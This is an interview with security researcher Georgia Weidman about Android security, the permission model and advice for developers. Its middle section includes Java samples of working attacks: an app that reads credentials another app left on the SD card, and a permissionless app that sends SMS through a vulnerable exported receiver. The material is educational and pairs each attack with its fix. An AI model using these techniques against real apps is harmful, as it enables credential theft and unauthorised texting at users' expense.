Android security from the ground up

Georgia Weidman is a penetration tester, security researcher, and trainer. She’s also one of the speakers at the upcoming HITBSecConf 2012 Amsterdam conference. In this interview she discusses the security issues on the Android platform and offers advice for application developers.

What are the most significant security issues on the Android platform today?
When I think about security issues in Android, I think not so much about the significant security improvements that have taken place, or about flaws that have been discovered and not adequately mitigated. Instead I think about how the functionality of Android and other smartphone platforms has evolved, and continues to evolve, to require a high degree of privacy and security for users.

I like this picture of an antique phone I took in Cali, Colombia at a conference last year.

This is closer to what most end users think an Android phone is than to what it really is. I cringe when I see an Android phone with a credit card reader attached, or when I see banks sending credentials via SMS. Don’t get me wrong, that sort of functionality is really cool, but Android security just isn’t ready for the needs of the functionality that’s available.

What advice would you give to Android developers when it comes to security? How can they make sure their applications are developed properly from the ground up?
Google has an informative page discussing security for Android developers. Unfortunately, as on other platforms, developers, particularly new developers, don’t design with security in mind.

You know how it goes. You get this great revolutionary idea and stay up for three days straight turning your vision into reality. No one is thinking about security, and that’s normal. Designing with security in mind is boring.

I studied secure software engineering in graduate school, and it had to be the dullest time of my entire life. But it’s necessary. A flaw in a game you write for Android can lead to the complete compromise of all the data on a user’s smartphone. Pay better attention to your professors than I did to mine, and think about the security implications of your app’s functionality.

And read the Google developer security page. There should be a requirement that developers read it before they get their developer’s license, like taking your driver’s test: you can kill people with a car, and you can destroy people’s lives with an insecure app. Unfortunately, as of now, the security page isn’t even referenced in the tutorials for new developers.

While researching the Android permissions model and ways it can be bypassed, you surely came upon some very creative techniques attackers are using. Can you share some examples with our readers?
Well, one of the things that makes Android such a dynamic and interesting platform for development is its open API model. The example Android itself uses is taking a picture: rather than coding the nitty-gritty for every phone or tablet or toaster that runs Android, your app can simply call an interface to the Camera app and have it return a picture to you. Try doing some of that stuff on an iPhone and you might just find yourself beating your head against the keyboard repeatedly.
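To make that concrete, here is a minimal sketch of that delegation using Android’s standard image-capture intent. The activity and method names are my own illustration, but MediaStore.ACTION_IMAGE_CAPTURE and the result callback are the standard mechanism:

    import android.app.Activity;
    import android.content.Intent;
    import android.graphics.Bitmap;
    import android.provider.MediaStore;

    public class PhotoActivity extends Activity {

        private static final int REQUEST_IMAGE_CAPTURE = 1; // arbitrary request code

        // Ask whatever camera app is installed to take the picture;
        // this app never touches the camera hardware directly.
        private void takePicture() {
            Intent intent = new Intent(MediaStore.ACTION_IMAGE_CAPTURE);
            startActivityForResult(intent, REQUEST_IMAGE_CAPTURE);
        }

        @Override
        protected void onActivityResult(int requestCode, int resultCode, Intent data) {
            if (requestCode == REQUEST_IMAGE_CAPTURE && resultCode == RESULT_OK) {
                // The camera app hands back a small preview bitmap in the extras.
                Bitmap thumbnail = (Bitmap) data.getExtras().get("data");
                // ... use the thumbnail ...
            }
        }
    }

Note that the calling app needs no camera permission of its own here; the Camera app does the capturing on its behalf.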

However, Android banks its security on the permission model. The idea is that if an app asks for the permission to, say, send an SMS message, and the user approves this at install time, then the app can send as many text messages as it likes. However, if the app in question does not explicitly ask the user for permission to send text messages, under no circumstances should that app be able to send a text message. Whether end users are making good decisions about app permissions is another story for another day, perhaps, but what I’m dealing with here is at what point, if any, the permission model as it stands breaks down, and why.
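For reference, the legitimate path looks roughly like this. The wrapper class is my own illustration, but the permission name and the SmsManager call are the standard Android API:

    import android.telephony.SmsManager;

    public class SmsExample {

        // Works only if the app's AndroidManifest.xml declares:
        //   <uses-permission android:name="android.permission.SEND_SMS" />
        // and the user approved that permission when installing the app.
        public static void sendText(String destination, String body) {
            SmsManager sms = SmsManager.getDefault();
            // scAddress, sentIntent and deliveryIntent are optional, hence the nulls.
            sms.sendTextMessage(destination, null, body, null, null);
        }
    }

Without the manifest declaration, the same call throws a SecurityException at runtime, which is the permission model working as intended.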

The first thing you should probably note is that in most situations the source code of Android apps can be almost completely recovered through reverse engineering. There’s plenty of information about that out there. So as a developer you should always assume attackers know how to interact with your files and interfaces if they are made publicly available. Security through obscurity definitely does not work with Android apps.

What I looked at in my research, and what I will be showing examples of in my talk at Hack in the Box Amsterdam, are cases where malicious apps are able to piggyback on the permissions of apps that are coded poorly and are thus vulnerable to this sort of attack. For example, consider an application that has permission to access sensitive data, say your credentials. That’s all well and good as long as the app uses those credentials appropriately and doesn’t send them anywhere malicious. But say the developer doesn’t consider the security implications and stores those credentials on the SD card of the Android phone. The SD card is formatted VFAT, so everything on it is world-readable. All an attacker would need to do is find the file name in the decompiled source code and write an app to steal the information. That app would not need any permission to access account credentials, but it would still be able to read them.
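A minimal sketch of both sides of that attack follows; the file name is hypothetical, and an attacker would recover it from the decompiled app:

    import android.os.Environment;
    import java.io.BufferedReader;
    import java.io.File;
    import java.io.FileReader;
    import java.io.FileWriter;
    import java.io.IOException;

    public class SdCardCredentials {

        // Hypothetical file name, recoverable by decompiling the vulnerable app.
        private static final String CREDS_FILE = "myapp_credentials.txt";

        // Vulnerable app: writes credentials to the SD card, which is VFAT
        // and therefore world-readable by every other app on the device.
        public static void saveCredentials(String username, String password)
                throws IOException {
            File out = new File(Environment.getExternalStorageDirectory(), CREDS_FILE);
            FileWriter writer = new FileWriter(out);
            writer.write(username + ":" + password);
            writer.close();
        }

        // Attacker app: needs no account or credential permissions at all;
        // it just reads the world-readable file straight off the SD card.
        public static String stealCredentials() throws IOException {
            File target = new File(Environment.getExternalStorageDirectory(), CREDS_FILE);
            BufferedReader reader = new BufferedReader(new FileReader(target));
            try {
                return reader.readLine(); // "username:password"
            } finally {
                reader.close();
            }
        }
    }

The fix is equally simple: keep sensitive files in the app’s private internal storage (for example via Context.openFileOutput), which other apps cannot read on a non-rooted device.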

For another example, let’s return to text messaging. Say, for example, an app has the permission to send SMS messages. If that functionality is exposed through an open interface, then any app, regardless of its own permissions, can also send SMS messages through it. Which takes us full circle, because open interfaces are one of the things that make Android so great. But they can completely undermine the security model if developers don’t use them correctly and with security in mind.
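Here is a minimal sketch of that confused-deputy pattern; the component and action names are hypothetical:

    import android.content.BroadcastReceiver;
    import android.content.Context;
    import android.content.Intent;
    import android.telephony.SmsManager;

    // Vulnerable app (holds SEND_SMS): this receiver is exported in the
    // manifest with an intent filter and no android:permission attribute,
    // so any app on the device can trigger it.
    public class SendSmsReceiver extends BroadcastReceiver {
        @Override
        public void onReceive(Context context, Intent intent) {
            String to = intent.getStringExtra("to");
            String body = intent.getStringExtra("body");
            // This app has the SEND_SMS permission, so the call succeeds
            // no matter who sent the broadcast.
            SmsManager.getDefault().sendTextMessage(to, null, body, null, null);
        }
    }

And the attacker’s side, from an app that never asked for SEND_SMS:

    import android.content.Context;
    import android.content.Intent;

    // Attacker app: never declared SEND_SMS, yet sends texts by proxy.
    public class SmsProxyAttack {
        public static void sendByProxy(Context context) {
            // Hypothetical action string matching the vulnerable receiver's filter.
            Intent proxy = new Intent("com.example.victim.SEND_SMS");
            proxy.putExtra("to", "+15555550100");   // e.g. a premium-rate number
            proxy.putExtra("body", "attacker-chosen text");
            context.sendBroadcast(proxy);
        }
    }

The defense is to protect the exported component with an android:permission attribute, or simply not to export it at all if only the app itself needs it.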

Unlike the Apple App Store, which has tight quality controls, the Android Market is much more relaxed. This enables cybercriminals to introduce Trojanized apps and cause havoc for unsuspecting users. In your opinion, what type of controls should Google put in place to make sure their users receive a suitable level of protection?
First off, do those controls stop iPhone malware from happening? Not at all. Look at Dr. Charlie Miller’s work, where he actually got a malicious app accepted into the Apple App Store. Charlie Miller is possibly one of the smartest guys around, but I bet that if he can do it, there are other, less ethical types up to the same sort of tricks. Apple claims 100% safety, a sort of “thou shalt not” from the mountaintop as far as malware is concerned, and that gives users a false sense of security. Malware happens. That’s just the nature of the beast. If a toaster had an IP address, some bored hacker a few doors down would be burning your toast.

I think the Android Market’s stance is much more realistic. They accept that malware happens and do what they can to fix any problems that arise. I know they are moving forward on this as well, with in-market malware detection and so on, and I’m interested to see what the future holds in this area. Again, malware is a hard problem. I’ll let you know when I solve it.
